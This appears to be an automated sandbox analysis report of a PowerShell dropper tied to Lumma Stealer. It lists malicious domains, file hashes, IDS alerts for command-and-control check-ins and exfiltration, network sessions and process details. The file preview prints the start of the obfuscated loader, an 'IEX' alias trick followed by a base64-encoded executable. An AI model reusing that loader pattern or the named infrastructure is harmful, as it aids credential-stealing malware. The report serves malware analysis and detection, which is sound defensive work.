twc.trafficmanager.net | | Get hash | malicious | Socks5Systemz | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | LummaC | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | RHADAMANTHYS | Browse | |
| | | Get hash | malicious | Remcos | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | FormBook | Browse | |
| | | Get hash | malicious | AgentTesla | Browse | |
| | | Get hash | malicious | Strela Stealer | Browse | |
s-part-0017.t-0009.fb-t-msedge.net | | Get hash | malicious | TechSupportScam | Browse | |
| | | Get hash | malicious | Lokibot | Browse | |
| | | Get hash | malicious | PureLog Stealer, Vidar | Browse | |
| | | Get hash | malicious | HTMLPhisher | Browse | |
| | | Get hash | malicious | HTMLPhisher | Browse | |
| | | Get hash | malicious | CobaltStrike | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | HTMLPhisher | Browse | |
| | | Get hash | malicious | HTMLPhisher | Browse | |
toppyneedus.biz | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | Amadey, LummaC Stealer, Stealc | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | DarkTortilla, FormBook | Browse | |
| | | Get hash | malicious | Unknown | Browse | |
| | | Get hash | malicious | Remcos | Browse | |
| | | Get hash | malicious | MassLogger RAT | Browse | |
| | | Get hash | malicious | FormBook | Browse | |
| | | Get hash | malicious | FormBook | Browse | |
| | | Get hash | malicious | Remcos | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | | Get hash | malicious | LummaC | Browse | |
| | | Get hash | malicious | SmokeLoader | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | Amadey, LummaC Stealer, Stealc | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.531881926582401 |
Encrypted: | false |
SSDEEP: | 96:yAF4jj5rxYidNRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAcf/VXT5NHBx:3slmGNR30mYAzuiFqZ24lO8 |
MD5: | 254F9C40983BBF66DD4D599441E34E87 |
SHA1: | EFD13C2E406DC83D1172E64EFE01A732C7183D10 |
SHA-256: | 41AEA0CA1960C23C0F124BA4665E9C70A02C1F1A9CF8AF130920413D2931DD10 |
SHA-512: | E52D9AEAA4BD094E8A3D712D18EE802ABCBC07D2CA3B50A6077F9DDE4EB66270162E63D0F07BE7761C99BAAC2F5287AAD92CB35C3C78D3208404F1CB19D7F05F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7284 |
Entropy (8bit): | 3.735348400968557 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetb4jQEXq6YkY7aULDEgmfHNpXErZn55aMWpm:R6l7wVeJ4jrq6YNa+DEgmftEZpWpm |
MD5: | 46D4987B77988FD35469EAF38B1683C2 |
SHA1: | 62817AF8ED50F7CC9CC27A349011C0CB97D0C61F |
SHA-256: | 44A67B725D52B31E236227589FE66B76EB6335F0D01ABCF78851FF4F346D4353 |
SHA-512: | 6497CF8A4B7BF3DD06C72C9FFDFE80478A33507F8DA650A1159058F377D066F5DE437A8E8DB7221E9EC7083DBDB798E1A7B59AAFA03A0C14668B50F938073F45 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.691974150507306 |
Encrypted: | false |
SSDEEP: | 96:uIjfKI7GP7VNJFKloFMMFl9wWTzFMMF0ufsd:uIeYGP7Z4cfcufS |
MD5: | 781FB32B23CED1AD8BC4BF07F91E6B8E |
SHA1: | C3688E35C5DA6BB1F07FE6744C56000CFD52A09C |
SHA-256: | 60FE7022A6DF9A06CC5C405AC1CAE25555DF3DB7635A30953C2836406FEA92E2 |
SHA-512: | 188E8C5FF577259975BE42CB3996A68B58876E2AD976BFA367F81D6EAF4CEAB578668A2A0324209FEFAA1BF19B66A3CDA726F1F999C1FE7F826EC1E924A1884F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul5mxllp:NllU4x/ |
MD5: | 3A925CB766CE4286E251C26E90B55CE8 |
SHA1: | 3FA8EE6E901101A4661723B94D6C9309E281BD28 |
SHA-256: | 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8 |
SHA-512: | F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6225 |
Entropy (8bit): | 3.736108937771384 |
Encrypted: | false |
SSDEEP: | 96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8 |
MD5: | 0F1D7D03A39B7AB28C7E2C75F3CF8332 |
SHA1: | 70761CBE65B6EFC0347E759757688C3C84CB0C3F |
SHA-256: | 719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A |
SHA-512: | BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6225 |
Entropy (8bit): | 3.736108937771384 |
Encrypted: | false |
SSDEEP: | 96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8 |
MD5: | 0F1D7D03A39B7AB28C7E2C75F3CF8332 |
SHA1: | 70761CBE65B6EFC0347E759757688C3C84CB0C3F |
SHA-256: | 719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A |
SHA-512: | BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.417449902710954 |
Encrypted: | false |
SSDEEP: | 6144:Mcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN/5+:hi58NSWIZBk2MM6AFB1o |
MD5: | B758660C24748E73B8A4D2EDCE9851CB |
SHA1: | 951DF3CE7AC9E6998523954A92130A4F6864C078 |
SHA-256: | D93D4925F9BAA62DB826125A4D95561817741B1457EBDDA2AD20B88464F9AF2C |
SHA-512: | C3BA27F08D88CD16504B064A04F9F4B1FEB2DB8A3832AF95B4D1D127B235D81CBD05E74FFF03C5F60B25F652A6CCAD6C97BAD8C72837375A60693C4F28900FB7 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.485284056284138 |
TrID: | |
File name: | 176.113.115.225.ps1 |
File size: | 546'028 bytes |
MD5: | eaf7ebe973ee32e26027ba74eb211b0c |
SHA1: | 29f2261e2a37e97045d000cc1bd0fb614cff9f74 |
SHA256: | 97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5 |
SHA512: | c35bd999fb35a1a28816622cdf743e5d2287b1a5933229d682ac0da1c96a91fc81dcdcd2daeac1e9dff79fc74f1c3af79e044037ff0318d13380addc7067b966 |
SSDEEP: | 12288:ZcTOT1uStOOovc4mkab9NY+2GyKKIoKUOwFL9:ZcTPStkvcVZT2GyQoKUOwFL9 |
TLSH: | E3C48D3141437D5E3F9A2ECA6400ADC10C8D3D97B614D584AE8A4276B2BE23B5F6D9FC |
File Content Preview: | .... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:20.506711+0100 | 2059421 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) | 1 | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:20.519335+0100 | 2059423 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) | 1 | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:21.067993+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.067993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.082393+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.908893+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
- Total Packets: 94
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 27, 2025 15:58:13.293934107 CET | 55563 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:13.300852060 CET | 53 | 55563 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.435970068 CET | 53738 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.449383974 CET | 53 | 53738 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.506711006 CET | 61999 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.515985966 CET | 53 | 61999 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.519335032 CET | 61168 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.530950069 CET | 53 | 61168 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 27, 2025 15:58:13.293934107 CET | 192.168.2.7 | 1.1.1.1 | 0x3cef | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.435970068 CET | 192.168.2.7 | 1.1.1.1 | 0x53da | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.506711006 CET | 192.168.2.7 | 1.1.1.1 | 0x7ea | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.519335032 CET | 192.168.2.7 | 1.1.1.1 | 0xccb6 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | | | 104.40.149.189 | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | | dual.s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | | | 13.107.253.45 | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.449383974 CET | 1.1.1.1 | 192.168.2.7 | 0x53da | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.515985966 CET | 1.1.1.1 | 192.168.2.7 | 0x7ea | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | | | 104.21.29.142 | A (IP address) | IN (0x0001) | false |
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | | | 172.67.149.66 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:21 UTC | 262 | OUT | |
2025-01-27 14:58:21 UTC | 8 | OUT | |
2025-01-27 14:58:21 UTC | 1125 | IN | |
2025-01-27 14:58:21 UTC | 7 | IN | |
2025-01-27 14:58:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:22 UTC | 263 | OUT | |
2025-01-27 14:58:22 UTC | 46 | OUT | |
2025-01-27 14:58:22 UTC | 1123 | IN | |
2025-01-27 14:58:22 UTC | 246 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:23 UTC | 279 | OUT | |
2025-01-27 14:58:23 UTC | 12831 | OUT | |
2025-01-27 14:58:24 UTC | 1122 | IN | |
2025-01-27 14:58:24 UTC | 20 | IN | |
2025-01-27 14:58:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:24 UTC | 273 | OUT | |
2025-01-27 14:58:24 UTC | 15027 | OUT | |
2025-01-27 14:58:25 UTC | 1126 | IN | |
2025-01-27 14:58:25 UTC | 20 | IN | |
2025-01-27 14:58:25 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:26 UTC | 277 | OUT | |
2025-01-27 14:58:26 UTC | 15331 | OUT | |
2025-01-27 14:58:26 UTC | 5045 | OUT | |
2025-01-27 14:58:26 UTC | 1127 | IN | |
2025-01-27 14:58:26 UTC | 20 | IN | |
2025-01-27 14:58:26 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:27 UTC | 277 | OUT | |
2025-01-27 14:58:27 UTC | 2610 | OUT | |
2025-01-27 14:58:28 UTC | 1124 | IN | |
2025-01-27 14:58:28 UTC | 20 | IN | |
2025-01-27 14:58:28 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:29 UTC | 272 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 15331 | OUT | |
2025-01-27 14:58:29 UTC | 12307 | OUT | |
2025-01-27 14:58:32 UTC | 1128 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:33 UTC | 263 | OUT | |
2025-01-27 14:58:33 UTC | 81 | OUT | |
2025-01-27 14:58:33 UTC | 1126 | IN | |
2025-01-27 14:58:33 UTC | 54 | IN | |
2025-01-27 14:58:33 UTC | 5 | IN |
Target ID: | 0 |
Start time: | 09:58:15 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 09:58:15 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:58:18 |
Start date: | 27/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd60000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 09:58:18 |
Start date: | 27/01/2025 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff73e620000 |
File size: | 229'728 bytes |
MD5 hash: | 74A0194782E039ACE1F7349544DC1CF4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage
Dynamic/Packed Code Coverage
Signature Coverage
Execution Coverage: | 5.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 37.3% |
Total number of Nodes: | 295 |
Total number of Limit Nodes: | 27 |